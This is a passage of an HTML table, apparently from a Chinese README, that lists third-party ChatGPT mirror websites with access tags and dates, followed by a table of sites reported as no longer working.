<td>188</td> <td> <a href="https://chat.icoding.ink/" target="_blank">https://chat.icoding.ink/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-06-17</td> <td><details> <summary>内容过长,点击展开</summary> 在聊天室使用时,请在提问的问题前面加上 @ChatGPT,否则 GPT 不搭理。 </details></td> </tr> <tr> <td>189</td> <td> <a href="https://wrtn.ai/" target="_blank">https://wrtn.ai/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-06-13</td> <td></td> </tr> <tr> <td>190</td> <td> <a href="https://ai.hxkj.vip/" target="_blank">https://ai.hxkj.vip/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-06-12</td> <td><details> <summary>内容过长,点击展开</summary> 未登录用户三天免费额度,登录用户无限制,支持AI绘图(Stable Diffusion 和 Midjourney) </details></td> </tr> <tr> <td>191</td> <td> <a href="https://carps.ink/" target="_blank">https://carps.ink/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-06-02</td> <td></td> </tr> <tr> <td>192</td> <td> <a href="https://chat.wenwen-ai.com/" target="_blank">https://chat.wenwen-ai.com/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-05-10</td> <td></td> </tr> <tr> <td>193</td> <td> <a href="https://gptcat.top/" target="_blank">https://gptcat.top/</a> <br> </td> <td> 🔒 💪 </td> <td>2024-07-05</td> <td></td> </tr> <tr> <td>194</td> <td> <a href="https://chat.mossaigpt.com/c/new" target="_blank">https://chat.mossaigpt.com/c/new</a> <br> </td> <td> 🔒 💪 </td> <td>2024-05-11</td> <td></td> </tr> <tr> <td>195</td> <td> <a href="https://www.chaindesk.ai/" target="_blank">https://www.chaindesk.ai/</a> <br> </td> <td> 🔒 💪 </td> <td>2024-01-19</td> <td></td> </tr> <tr> <td>196</td> <td> <a href="https://chat001.7x24h.online/" target="_blank">https://chat001.7x24h.online/</a> <br> </td> <td> 🔒 💪 </td> <td>2024-01-18</td> <td></td> </tr> <tr> <td>197</td> <td> <a href="https://yewu.bcwhkj.cn" target="_blank">https://yewu.bcwhkj.cn</a> <br> </td> <td> 🔒 💪 </td> <td>2024-01-04</td> <td></td> </tr> <tr> <td>198</td> <td> <a href="https://aibusx.com/" target="_blank">https://aibusx.com/</a> <br> </td> <td> 🔒 💪 </td> <td>2024-01-04</td> <td></td> </tr> <tr> <td>199</td> <td> <a href="https://www.gnomic.cn/agentCenter/index" target="_blank">https://www.gnomic.cn/agentCenter/index</a> <br> </td> <td> 🔒 💪 </td> <td>2023-12-30</td> <td></td> </tr> <tr> <td>200</td> <td> <a href="https://feel-gpt.fun" target="_blank">https://feel-gpt.fun</a> <br> </td> <td> 🔒 💪 </td> <td>2023-12-07</td> <td></td> </tr> <tr> <td>201</td> <td> <a href="https://llm.huashuyz.com/" target="_blank">https://llm.huashuyz.com/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-12-06</td> <td></td> </tr> <tr> <td>202</td> <td> <a href="https://dacongming.cc" target="_blank">https://dacongming.cc</a> <br> </td> <td> 💪 🔒 </td> <td>2023-11-26</td> <td></td> </tr> <tr> <td>203</td> <td> <a href="https://imyai.top/" target="_blank">https://imyai.top/</a> <br> </td> <td> 💪 🔒 </td> <td>2023-11-19</td> <td></td> </tr> <tr> <td>204</td> <td> <a href="https://ai.haydenstudio.hk" target="_blank">https://ai.haydenstudio.hk</a> <br> </td> <td> 🔒 💪 </td> <td>2023-10-31</td> <td></td> </tr> <tr> <td>205</td> <td> <a href="http://www.znzs.me/" target="_blank">http://www.znzs.me/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-09-23</td> <td></td> </tr> <tr> <td>206</td> <td> <a href="https://chat8.com/" target="_blank">https://chat8.com/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-08-28</td> <td></td> </tr> <tr> <td>207</td> <td> <a href="https://feel-gpt.top" target="_blank">https://feel-gpt.top</a> <br> </td> <td> 🔒 💪 </td> <td>2023-08-25</td> <td></td> </tr> <tr> <td>208</td> <td> <a href="https://aassdd.opao.xyz" target="_blank">https://aassdd.opao.xyz</a> <br> </td> <td> 🔒 💪 </td> <td>2023-07-09</td> <td></td> </tr> <tr> <td>209</td> <td> <a href="https://zhuo.mkzero.top:17777/" target="_blank">https://zhuo.mkzero.top:17777/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-06-27</td> <td></td> </tr> <tr> <td>210</td> <td> <a href="https://ai.mkzero.top:44444/" target="_blank">https://ai.mkzero.top:44444/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-06-27</td> <td></td> </tr> <tr> <td>211</td> <td> <a href="https://firstai.opao.xyz/" target="_blank">https://firstai.opao.xyz/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-06-20</td> <td></td> </tr> <tr> <td>212</td> <td> <a href="https://www.ai2dog.com/bavarder" target="_blank">https://www.ai2dog.com/bavarder</a> <br> </td> <td> 🔒 💪 </td> <td>2023-06-16</td> <td></td> </tr> <tr> <td>213</td> <td> <a href="https://candy666.top/" target="_blank">https://candy666.top/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-06-15</td> <td></td> </tr> <tr> <td>214</td> <td> <a href="https://ai.fanyi.im" target="_blank">https://ai.fanyi.im</a> <br> </td> <td> 👀 💪 </td> <td>2023-06-09</td> <td></td> </tr> <tr> <td>215</td> <td> <a href="https://chat.gpt4plus.fun" target="_blank">https://chat.gpt4plus.fun</a> <br> </td> <td> 🔒 💪 </td> <td>2023-06-09</td> <td></td> </tr> <tr> <td>216</td> <td> <a href="https://chat.immuseai.com/" target="_blank">https://chat.immuseai.com/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-06-04</td> <td></td> </tr> <tr> <td>217</td> <td> <a href="https://chat.bumo.tech/" target="_blank">https://chat.bumo.tech/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-05-29</td> <td></td> </tr> <tr> <td>218</td> <td> <a href="https://chat.zhenbs.com/" target="_blank">https://chat.zhenbs.com/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-05-17</td> <td>GPT4 的兑换码:TRYGPT4</td> </tr> <tr> <td>219</td> <td> <a href="https://gpt4.gravityengine.cc/" target="_blank">https://gpt4.gravityengine.cc/</a> <br> </td> <td> 🔑 🌎 </td> <td>2023-05-16</td> <td></td> </tr> <tr> <td>220</td> <td> <a href="https://chat.iwoso.co/" target="_blank">https://chat.iwoso.co/</a> <br> </td> <td> 🔑 🌎 </td> <td>2023-04-21</td> <td></td> </tr> <tr> <td>221</td> <td> <a href="https://chatbot.theb.ai/" target="_blank">https://chatbot.theb.ai/</a> <br> </td> <td> 🆓 🌎 🔒 </td> <td>2023-04-20</td> <td></td> </tr> <tr> <td>222</td> <td> <a href="https://nat.dev/" target="_blank">https://nat.dev/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-04-07</td> <td></td> </tr> <tr> <td>223</td> <td> <a href="https://fastgpt.app/" target="_blank">https://fastgpt.app/</a> <br> </td> <td> 🔓 🔑 🌎 💪 </td> <td>2023-04-04</td> <td></td> </tr> <tr> <td>224</td> <td> <a href="https://freechatgpt.chat/" target="_blank">https://freechatgpt.chat/</a> <br> </td> <td> 🔑 🌎 </td> <td>2023-04-04</td> <td></td> </tr> <tr> <td>225</td> <td> <a href="https://www.chatbotui.com/" target="_blank">https://www.chatbotui.com/</a> <br> </td> <td> 🔑 🌎 </td> <td>2023-04-04</td> <td></td> </tr> <tr> <td>226</td> <td> <a href="https://chat.gpt.bz/" target="_blank">https://chat.gpt.bz/</a> <br> </td> <td> 🔒 💪 </td> <td>2023-04-03</td> <td></td> </tr> <tr> <td>227</td> <td> <a href="https://94gpt.com/" target="_blank">https://94gpt.com/</a> <br> </td> <td> 🔑 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>228</td> <td> <a href="https://wang.gptnb.xyz/" target="_blank">https://wang.gptnb.xyz/</a> <br> </td> <td> 🔒 🧰 </td> <td>2024-06-10</td> <td></td> </tr> <tr> <td>229</td> <td> <a href="https://chat.0oai.com" target="_blank">https://chat.0oai.com</a> <br> </td> <td> 🔒 🧰 </td> <td>2024-02-16</td> <td></td> </tr> <tr> <td>230</td> <td> <a href="https://wielded.com/" target="_blank">https://wielded.com/</a> <br> </td> <td> 🌎 🔒 💪 🧰 </td> <td>2024-01-25</td> <td></td> </tr> <tr> <td>231</td> <td> <a href="https://smallai.sellhigh.asia" target="_blank">https://smallai.sellhigh.asia</a> <br> </td> <td> 🔓 💰 💪 🧰 </td> <td>2023-12-10</td> <td></td> </tr> <tr> <td>232</td> <td> <a href="https://www.ealxc.com/" target="_blank">https://www.ealxc.com/</a> <br> </td> <td> 🔒 🌎 💪 🧰 </td> <td>2023-12-09</td> <td></td> </tr> <tr> <td>233</td> <td> <a href="https://ai.imiphp.com/" target="_blank">https://ai.imiphp.com/</a> <br> </td> <td> 🔒 🧰 </td> <td>2023-09-01</td> <td></td> </tr> <tr> <td>234</td> <td> <a href="https://dzyai.com/chat" target="_blank">https://dzyai.com/chat</a> <br> </td> <td> 👀 🧰 </td> <td>2023-07-26</td> <td></td> </tr> <tr> <td>235</td> <td> <a href="https://gptplus.io/" target="_blank">https://gptplus.io/</a> <br> </td> <td> 🔒 🧰 </td> <td>2023-07-13</td> <td></td> </tr> <tr> <td>236</td> <td> <a href="https://ai-connect.cn/chat" target="_blank">https://ai-connect.cn/chat</a> <br> </td> <td> 🔒 🧰 </td> <td>2023-07-06</td> <td></td> </tr> <tr> <td>237</td> <td> <a href="https://zhiziera.com/" target="_blank">https://zhiziera.com/</a> <br> </td> <td> 🔒 🧰 </td> <td>2023-06-28</td> <td></td> </tr> <tr> <td>238</td> <td> <a href="http://zhiziera.com/" target="_blank">http://zhiziera.com/</a> <br> </td> <td> 🔒 🧰 </td> <td>2023-06-23</td> <td></td> </tr> <tr> <td>239</td> <td> <a href="https://xdu.cn/" target="_blank">https://xdu.cn/</a> <br> </td> <td> 🔒 🧰 </td> <td>2023-06-17</td> <td></td> </tr> <tr> <td>240</td> <td> <a href="https://c1ns.cn/wlyzs" target="_blank">https://c1ns.cn/wlyzs</a> <br> </td> <td> 👀 🧰 </td> <td>2023-06-16</td> <td></td> </tr> <tr> <td>241</td> <td> <a href="https://chat.ijixian.com.cn" target="_blank">https://chat.ijixian.com.cn</a> <br> </td> <td> 🔒 🧰 </td> <td>2023-06-09</td> <td></td> </tr> <tr> <td>242</td> <td> <a href="https://www.magicaibot.com/talk" target="_blank">https://www.magicaibot.com/talk</a> <br> </td> <td> 👀 🧰 </td> <td>2023-06-01</td> <td></td> </tr> <tr> <td>243</td> <td> <a href="https://www.dqzboy.top/" target="_blank">https://www.dqzboy.top/</a> <br> </td> <td> 🔒 🧰 </td> <td>2023-05-27</td> <td></td> </tr> <tr> <td>244</td> <td> <a href="https://chat.gptdsb.com/" target="_blank">https://chat.gptdsb.com/</a> <br> </td> <td> 🔒 </td> <td>2024-04-18</td> <td></td> </tr> <tr> <td>245</td> <td> <a href="https://chatgai.lovepor.cn/" target="_blank">https://chatgai.lovepor.cn/</a> <br> </td> <td> 🔒 </td> <td>2024-03-15</td> <td></td> </tr> <tr> <td>246</td> <td> <a href="https://chat.chat826.com/" target="_blank">https://chat.chat826.com/</a> <br> </td> <td> 🔒 </td> <td>2024-03-06</td> <td></td> </tr> <tr> <td>247</td> <td> <a href="https://aigc.unipus.cn/" target="_blank">https://aigc.unipus.cn/</a> <br> </td> <td> 🔒 </td> <td>2024-03-05</td> <td></td> </tr> <tr> <td>248</td> <td> <a href="https://agi.aiearth.dev/" target="_blank">https://agi.aiearth.dev/</a> <br> </td> <td> 🔒 </td> <td>2024-02-21</td> <td></td> </tr> <tr> <td>249</td> <td> <a href="https://chat.weijiajin.com" target="_blank">https://chat.weijiajin.com</a> <br> </td> <td> 🔒 </td> <td>2024-02-05</td> <td></td> </tr> <tr> <td>250</td> <td> <a href="https://aibox365.com" target="_blank">https://aibox365.com</a> <br> </td> <td> 🔒 </td> <td>2024-02-05</td> <td></td> </tr> <tr> <td>251</td> <td> <a href="https://chat.fengzhengx.cn/" target="_blank">https://chat.fengzhengx.cn/</a> <br> </td> <td> 🔒 </td> <td>2024-01-15</td> <td></td> </tr> <tr> <td>252</td> <td> <a href="https://gpt.100ai.fun" target="_blank">https://gpt.100ai.fun</a> <br> </td> <td> 🔒 </td> <td>2023-12-30</td> <td></td> </tr> <tr> <td>253</td> <td> <a href="https://ct10.xiami.monster/" target="_blank">https://ct10.xiami.monster/</a> <br> </td> <td> 🔒 </td> <td>2023-11-26</td> <td>发布页 https://fby.xiamis.xyz/</td> </tr> <tr> <td>254</td> <td> <a href="https://ai.aichat.vin" target="_blank">https://ai.aichat.vin</a> <br> </td> <td> 🔒 </td> <td>2023-11-15</td> <td></td> </tr> <tr> <td>255</td> <td> <a href="https://aivesa.cn/" target="_blank">https://aivesa.cn/</a> <br> </td> <td> 🔓 👀 💪 </td> <td>2023-11-02</td> <td></td> </tr> <tr> <td>256</td> <td> <a href="https://api.xn--7gqr4f.com/" target="_blank">https://api.xn--7gqr4f.com/</a> <br> </td> <td> 🔒 </td> <td>2023-10-22</td> <td></td> </tr> <tr> <td>257</td> <td> <a href="https://chat.xiaomingyan.com" target="_blank">https://chat.xiaomingyan.com</a> <br> </td> <td> 👀 </td> <td>2023-09-21</td> <td></td> </tr> <tr> <td>258</td> <td> <a href="http://chat.tensorbytes.com" target="_blank">http://chat.tensorbytes.com</a> <br> </td> <td> 🔒 </td> <td>2023-08-22</td> <td></td> </tr> <tr> <td>259</td> <td> <a href="https://freechat.xiaopao.link" target="_blank">https://freechat.xiaopao.link</a> <br> </td> <td> 🔒 </td> <td>2023-08-04</td> <td></td> </tr> <tr> <td>260</td> <td> <a href="https://chat.gpt.bz/" target="_blank">https://chat.gpt.bz/</a> <br> </td> <td> 🔒 💪 🌎 </td> <td>2023-08-01</td> <td></td> </tr> <tr> <td>261</td> <td> <a href="https://dashuye.top" target="_blank">https://dashuye.top</a> <br> </td> <td> 🔒 </td> <td>2023-06-29</td> <td></td> </tr> <tr> <td>262</td> <td> <a href="https://jqk.ai" target="_blank">https://jqk.ai</a> <br> </td> <td> 🔒 </td> <td>2023-06-27</td> <td></td> </tr> <tr> <td>263</td> <td> <a href="http://ai.mkzero.top:44444/" target="_blank">http://ai.mkzero.top:44444/</a> <br> </td> <td> 🔒 </td> <td>2023-06-18</td> <td></td> </tr> <tr> <td>264</td> <td> <a href="https://zyzyai.cn" target="_blank">https://zyzyai.cn</a> <br> </td> <td> 🔒 </td> <td>2023-06-16</td> <td></td> </tr> <tr> <td>265</td> <td> <a href="http://chat.moyifeng.top/" target="_blank">http://chat.moyifeng.top/</a> <br> </td> <td> 🔒 </td> <td>2023-06-14</td> <td></td> </tr> <tr> <td>266</td> <td> <a href="https://www.confman.com/chat" target="_blank">https://www.confman.com/chat</a> <br> </td> <td> 🔒 </td> <td>2023-06-11</td> <td></td> </tr> <tr> <td>267</td> <td> <a href="https://emkok.com" target="_blank">https://emkok.com</a> <br> </td> <td> 🔒 </td> <td>2023-06-08</td> <td><details> <summary>内容过长,点击展开</summary> 以提示词创建的指令应用 GPT 平台,目前已经有 200+ 应用 </details></td> </tr> <tr> <td>268</td> <td> <a href="https://varmsg.com/" target="_blank">https://varmsg.com/</a> <br> </td> <td> 🔒 </td> <td>2023-06-05</td> <td></td> </tr> <tr> <td>269</td> <td> <a href="https://home.xiamis.xyz/" target="_blank">https://home.xiamis.xyz/</a> <br> </td> <td> 👀 </td> <td>2023-06-02</td> <td></td> </tr> <tr> <td>270</td> <td> <a href="https://chatgptmirror.com/" target="_blank">https://chatgptmirror.com/</a> <br> </td> <td> 🔒 </td> <td>2023-06-01</td> <td></td> </tr> <tr> <td>271</td> <td> <a href="https://ai.douresources.com" target="_blank">https://ai.douresources.com</a> <br> </td> <td> 👀 </td> <td>2023-05-31</td> <td></td> </tr> <tr> <td>272</td> <td> <a href="http://a1ya.cn/9df35d55c75a5a90" target="_blank">http://a1ya.cn/9df35d55c75a5a90</a> <br> </td> <td> 🔒 </td> <td>2023-05-29</td> <td></td> </tr> <tr> <td>273</td> <td> <a href="http://chatgpt.bamboochat.cn/" target="_blank">http://chatgpt.bamboochat.cn/</a> <br> </td> <td> 🔒 </td> <td>2023-05-29</td> <td></td> </tr> <tr> <td>274</td> <td> <a href="https://aihalo.chat/" target="_blank">https://aihalo.chat/</a> <br> </td> <td> 🔒 </td> <td>2023-05-28</td> <td></td> </tr> <tr> <td>275</td> <td> <a href="https://chat1.wobcw.com/" target="_blank">https://chat1.wobcw.com/</a> <br> </td> <td> 👀 </td> <td>2023-05-26</td> <td></td> </tr> <tr> <td>276</td> <td> <a href="https://ai.iiter.cn/" target="_blank">https://ai.iiter.cn/</a> <br> </td> <td> 👀 </td> <td>2023-05-25</td> <td></td> </tr> <tr> <td>277</td> <td> <a href="https://www.openaicloud.cloud/" target="_blank">https://www.openaicloud.cloud/</a> <br> </td> <td> 🔒 </td> <td>2023-05-22</td> <td></td> </tr> <tr> <td>278</td> <td> <a href="https://gpts.dawu.world/" target="_blank">https://gpts.dawu.world/</a> <br> </td> <td> 🔒 </td> <td>2023-05-22</td> <td></td> </tr> <tr> <td>279</td> <td> <a href="https://aiget.cc/" target="_blank">https://aiget.cc/</a> <br> </td> <td> 🔒 </td> <td>2023-05-17</td> <td></td> </tr> <tr> <td>280</td> <td> <a href="http://bamboochat.kebakeba.com/" target="_blank">http://bamboochat.kebakeba.com/</a> <br> </td> <td> 🔒 </td> <td>2023-05-12</td> <td></td> </tr> <tr> <td>281</td> <td> <a href="https://gpt.uziai.com/" target="_blank">https://gpt.uziai.com/</a> <br> </td> <td> 🔒 </td> <td>2023-05-11</td> <td></td> </tr> <tr> <td>282</td> <td> <a href="https://chat.bumo.ai/" target="_blank">https://chat.bumo.ai/</a> <br> </td> <td> 🔒 🌎 💪 </td> <td>2023-05-07</td> <td></td> </tr> <tr> <td>283</td> <td> <a href="https://ai.hxkj.vip/" target="_blank">https://ai.hxkj.vip/</a> <br> </td> <td> 🔒 </td> <td>2023-05-06</td> <td></td> </tr> <tr> <td>284</td> <td> <a href="https://qxme.com/" target="_blank">https://qxme.com/</a> <br> </td> <td> 🔒 </td> <td>2023-05-04</td> <td></td> </tr> <tr> <td>285</td> <td> <a href="https://chat.douresources.com/" target="_blank">https://chat.douresources.com/</a> <br> </td> <td> 👀 </td> <td>2023-04-28</td> <td></td> </tr> <tr> <td>286</td> <td> <a href="https://www.vivi-chat.com/#/chat" target="_blank">https://www.vivi-chat.com/#/chat</a> <br> </td> <td> 🔒 </td> <td>2023-04-22</td> <td></td> </tr> <tr> <td>287</td> <td> <a href="https://openmao.panchuang.net/" target="_blank">https://openmao.panchuang.net/</a> <br> </td> <td> 🔒 </td> <td>2023-04-18</td> <td></td> </tr> <tr> <td>288</td> <td> <a href="https://www.weijiwangluo.com/talk" target="_blank">https://www.weijiwangluo.com/talk</a> <br> </td> <td> 🔒 </td> <td>2023-04-18</td> <td></td> </tr> <tr> <td>289</td> <td> <a href="https://www.chatgptunli.com/chatgpt/" target="_blank">https://www.chatgptunli.com/chatgpt/</a> <br> </td> <td> 🔒 </td> <td>2023-04-11</td> <td></td> </tr> <tr> <td>290</td> <td> <a href="https://chat.alpaca-bi.com/" target="_blank">https://chat.alpaca-bi.com/</a> <br> </td> <td> 🔒 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>291</td> <td> <a href="https://beta.bushiai.com/" target="_blank">https://beta.bushiai.com/</a> <br> </td> <td> 🌎 🔒 🧰 </td> <td>2023-09-07</td> <td></td> </tr> <tr> <td>292</td> <td> <a href="https://www.sweetsai.com/" target="_blank">https://www.sweetsai.com/</a> <br> </td> <td> 🔒 🌎 </td> <td>2023-05-24</td> <td></td> </tr> <tr> <td>293</td> <td> <a href="https://open-gpt.app/" target="_blank">https://open-gpt.app/</a> <br> </td> <td> 🔒 🌎 </td> <td>2023-03-29</td> <td></td> </tr> <tr> <td>294</td> <td> <a href="https://chat4.leapgpt.top/" target="_blank">https://chat4.leapgpt.top/</a> <br> </td> <td> 🔑 💰 💪 🧰 </td> <td>2023-11-09</td> <td></td> </tr> <tr> <td>295</td> <td> <a href="https://gpt.ltopx.com" target="_blank">https://gpt.ltopx.com</a> <br> </td> <td> 🔒 🔑 🧰 </td> <td>2023-06-20</td> <td></td> </tr> <tr> <td>296</td> <td> <a href="https://caffcat.co/" target="_blank">https://caffcat.co/</a> <br> </td> <td> 🔒 🔑 </td> <td>2023-08-24</td> <td></td> </tr> <tr> <td>297</td> <td> <a href="https://ai.01rj.cn/" target="_blank">https://ai.01rj.cn/</a> <br> </td> <td> 🔒 💰 💪 🧰 </td> <td>2023-09-23</td> <td></td> </tr> </tbody> </table> <!-- normal-end --> <details> <summary>🚫 已失效</summary> <!-- abnormal-begin --> <table> <thead> <tr> <th>序号</th> <th>网站</th> <th>报告失效时间</th> </tr> </thead> <tbody> <tr> <td>1</td> <td><del> <a href="https://chat.baimoqilin.top/" target="_blank">https://chat.baimoqilin.top/</a> </del> </td> <td>2024-06-09</td> </tr> <tr> <td>2</td> <td><del> <a href="https://chat.gptoai.cc/list" target="_blank">https://chat.gptoai.cc/list</a> </del> </td> <td>2024-05-16</td> </tr> <tr> <td>3</td> <td><del> <a href="https://chat.swt-ai.com/" target="_blank">https://chat.swt-ai.com/</a> </del> </td> <td>2024-05-16</td> </tr> <tr> <td>4</td> <td><del> <a href="https://ck-ai.co" target="_blank">https://ck-ai.co</a> </del> </td> <td>2024-02-20</td> </tr> <tr> <td>5</td> <td><del> <a href="https://share.wendabao.net" target="_blank">https://share.wendabao.net</a> </del> </td> <td>2024-02-04</td> </tr> <tr> <td>6</td> <td><del> <a href="https://talkai.info/" target="_blank">https://talkai.info/</a> </del> </td> <td>2024-02-04</td> </tr> <tr> <td>7</td> <td><del> <a href="https://chat.atmoses.uk/" target="_blank">https://chat.atmoses.uk/</a> </del> </td> <td>2024-01-12</td> </tr> <tr> <td>8</td> <td><del> <a href="http://newpc.i-coding.top" target="_blank">http://newpc.i-coding.top</a> </del> </td> <td>2024-01-10</td> </tr> <tr> <td>9</td> <td><del> <a href="https://chat.zonas.wang" target="_blank">https://chat.zonas.wang</a> </del> </td> <td>2024-01-08</td> </tr> <tr> <td>10</td> <td><del> <a href="https://chat.meizi.me" target="_blank">https://chat.meizi.me</a> </del> </td> <td>2023-12-30</td> </tr> <tr> <td>11</td> <td><del> <a href="https://ss.sbai.free.hr/" target="_blank">https://ss.sbai.free.hr/</a> </del> </td> <td>2023-12-30</td> </tr> <tr> <td>12</td> <td><del> <a href="https://ai.ai365.ink" target="_blank">https://ai.ai365.ink</a> </del> </td> <td>2023-12-26</td> </tr> <tr> <td>13</td> <td><del> <a href="https://www.aitool.ink/" target="_blank">https://www.aitool.ink/</a> </del> </td> <td>2023-12-24</td> </tr> <tr> <td>14</td> <td><del> <a href="https://chat.aiptl.com" target="_blank">https://chat.aiptl.com</a> </del> </td> <td>2023-12-17</td> </tr> <tr> <td>15</td> <td><del> <a href="https://wu.ci/" target="_blank">https://wu.ci/</a> </del> </td> <td>2023-12-16</td> </tr> <tr> <td>16</td> <td><del> <a href="https://ai.maijigc.com/nav/" target="_blank">https://ai.maijigc.com/nav/</a> </del> </td> <td>2023-12-10</td> </tr> <tr> <td>17</td> <td><del> <a href="https://chat.wobcw.com/" target="_blank">https://chat.wobcw.com/</a> </del> </td> <td>2023-12-08</td> </tr> <tr> <td>18</td> <td><del> <a href="http://a.x-code.fun/" target="_blank">http://a.x-code.fun/</a> </del> </td> <td>2023-11-15</td> </tr> <tr> <td>19</td> <td><del> <a href="http://chat3.aiyunos.top" target="_blank">http://chat3.aiyunos.top</a> </del> </td> <td>2023-10-10</td> </tr> <tr> <td>20</td> <td><del> <a href="https://ai.skybyte.me" target="_blank">https://ai.skybyte.me</a> </del> </td> <td>2023-10-09</td> </tr> <tr> <td>21</td> <td><del> <a href="https://chat.aigc101.net/" target="_blank">https://chat.aigc101.net/</a> </del> </td> <td>2023-10-01</td> </tr> <tr> <td>22</td> <td><del> <a href="https://py.c1ns.cn" target="_blank">https://py.c1ns.cn</a> </del> </td> <td>2023-09-24</td> </tr> <tr> <td>23</td> <td><del> <a href="https://free.icoding.ink/" target="_blank">https://free.icoding.ink/</a> </del> </td> <td>2023-09-14</td> </tr> <tr> <td>24</td> <td><del> <a href="https://coffeecat.info/" target="_blank">https://coffeecat.info/</a> </del> </td> <td>2023-08-31</td> </tr> <tr> <td>25</td> <td><del> <a href="https://chat.gptx.im/" target="_blank">https://chat.gptx.im/</a> </del> </td> <td>2023-08-30</td> </tr> <tr> <td>26</td> <td><del> <a href="https://aiin.cc/" target="_blank">https://aiin.cc/</a> </del> </td> <td>2023-08-29</td> </tr> <tr> <td>27</td> <td><del> <a href="https://chat.zhile.io/" target="_blank">https://chat.zhile.io/</a> </del> </td> <td>2023-08-21</td> </tr> <tr> <td>28</td> <td><del> <a href="https://chat-shared2.zhile.io/" target="_blank">https://chat-shared2.zhile.io/</a> </del> </td> <td>2023-08-21</td> </tr> <tr> <td>29</td> <td><del> <a href="https://chat.geekgpt.org/" target="_blank">https://chat.geekgpt.org/</a> </del> </td> <td>2023-08-16</td> </tr> <tr> <td>30</td> <td><del> <a href="https://macio.cc" target="_blank">https://macio.cc</a> </del> </td> <td>2023-08-15</td> </tr> <tr> <td>31</td> <td><del> <a href="https://chat.waixingyun.cn/" target="_blank">https://chat.waixingyun.cn/</a> </del> </td> <td>2023-08-11</td> </tr> <tr> <td>32</td> <td><del> <a href="https://chat.dfehub.com" target="_blank">https://chat.dfehub.com</a> </del> </td> <td>2023-08-07</td> </tr> <tr> <td>33</td> <td><del> <a href="https://www.aibvs.net/chat" target="_blank">https://www.aibvs.net/chat</a> </del> </td> <td>2023-08-04</td> </tr> <tr> <td>34</td> <td><del> <a href="https://gptleg.zeabur.app/" target="_blank">https://gptleg.zeabur.app/</a> </del> </td> <td>2023-08-01</td> </tr> <tr> <td>35</td> <td><del> <a href="https://chat.wudi11.shop/" target="_blank">https://chat.wudi11.shop/</a> </del> </td> <td>2023-07-31</td> </tr> <tr> <td>36</td> <td><del> <a href="https://gpt4.ezchat.top/" target="_blank">https://gpt4.ezchat.top/</a> </del> </td> <td>2023-07-31</td> </tr> <tr> <td>37</td> <td><del> <a href="https://free.freet.top" target="_blank">https://free.freet.top</a> </del> </td> <td>2023-07-29</td> </tr> <tr> <td>38</td> <td><del> <a href="https://doai.c1ns.cn" target="_blank">https://doai.c1ns.cn</a> </del> </td> <td>2023-07-27</td> </tr> <tr> <td>39</td> <td><del> <a href="https://xiaor.eu.org/" target="_blank">https://xiaor.eu.org/</a> </del> </td> <td>2023-07-20</td> </tr> <tr> <td>40</td> <td><del> <a href="https://xiaoc.eu.org/" target="_blank">https://xiaoc.eu.org/</a> </del> </td> <td>2023-07-20</td> </tr> <tr> <td>41</td> <td><del> <a href="https://macqv.com" target="_blank">https://macqv.com</a> </del> </td> <td>2023-07-18</td> </tr> <tr> <td>42</td> <td><del> <a href="https://chatgpt-free.pro" target="_blank">https://chatgpt-free.pro</a> </del> </td> <td>2023-06-27</td> </tr> <tr> <td>43</td> <td><del> <a href="https://www.aibvs.com/chat" target="_blank">https://www.aibvs.com/chat</a> </del> </td> <td>2023-06-26</td> </tr> <tr> <td>44</td> <td><del> <a href="https://macll.cn/" target="_blank">https://macll.cn/</a> </del> </td> <td>2023-06-26</td> </tr> <tr> <td>45</td> <td><del> <a href="https://askgpt.cn/" target="_blank">https://askgpt.cn/</a> </del> </td> <td>2023-06-19</td> </tr> <tr> <td>46</td> <td><del> <a href="https://f1.nbai.live/" target="_blank">https://f1.nbai.live/</a> </del> </td> <td>2023-06-13</td> </tr> <tr> <td>47</td> <td><del> <a href="https://chatgptdddd.com/" target="_blank">https://chatgptdddd.com/</a> </del> </td> <td>2023-06-06</td> </tr> <tr> <td>48</td> <td><del> <a href="http://gpt.hz-it-dev.com/" target="_blank">http://gpt.hz-it-dev.com/</a> </del> </td> <td>2023-05-30</td> </tr> <tr> <td>49</td> <td><del> <a href="https://www.freechatsgpt.com/" target="_blank">https://www.freechatsgpt.com/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>50</td> <td><del> <a href="https://qa.6bbs.cn/" target="_blank">https://qa.6bbs.cn/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>51</td> <td><del> <a href="https://ai.dw3.io/" target="_blank">https://ai.dw3.io/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>52</td> <td><del> <a href="https://jiehan.tech/" target="_blank">https://jiehan.tech/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>53</td> <td><del> <a href="https://f1.52chye.cn/" target="_blank">https://f1.52chye.cn/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>54</td> <td><del> <a href="https://a.aizh.app/" target="_blank">https://a.aizh.app/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>55</td> <td><del> <a href="https://gpt.xcbl.cc/" target="_blank">https://gpt.xcbl.cc/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>56</td> <td><del> <a href="https://chatgptproxy.info/" target="_blank">https://chatgptproxy.info/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>57</td> <td><del> <a href="https://chat.aicn.me/" target="_blank">https://chat.aicn.me/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>58</td> <td><del> <a href="https://ai.cheapy.top/" target="_blank">https://ai.cheapy.top/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>59</td> <td><del> <a href="https://chatgpt.hoposoft.com/" target="_blank">https://chatgpt.hoposoft.com/</a> </del> </td> 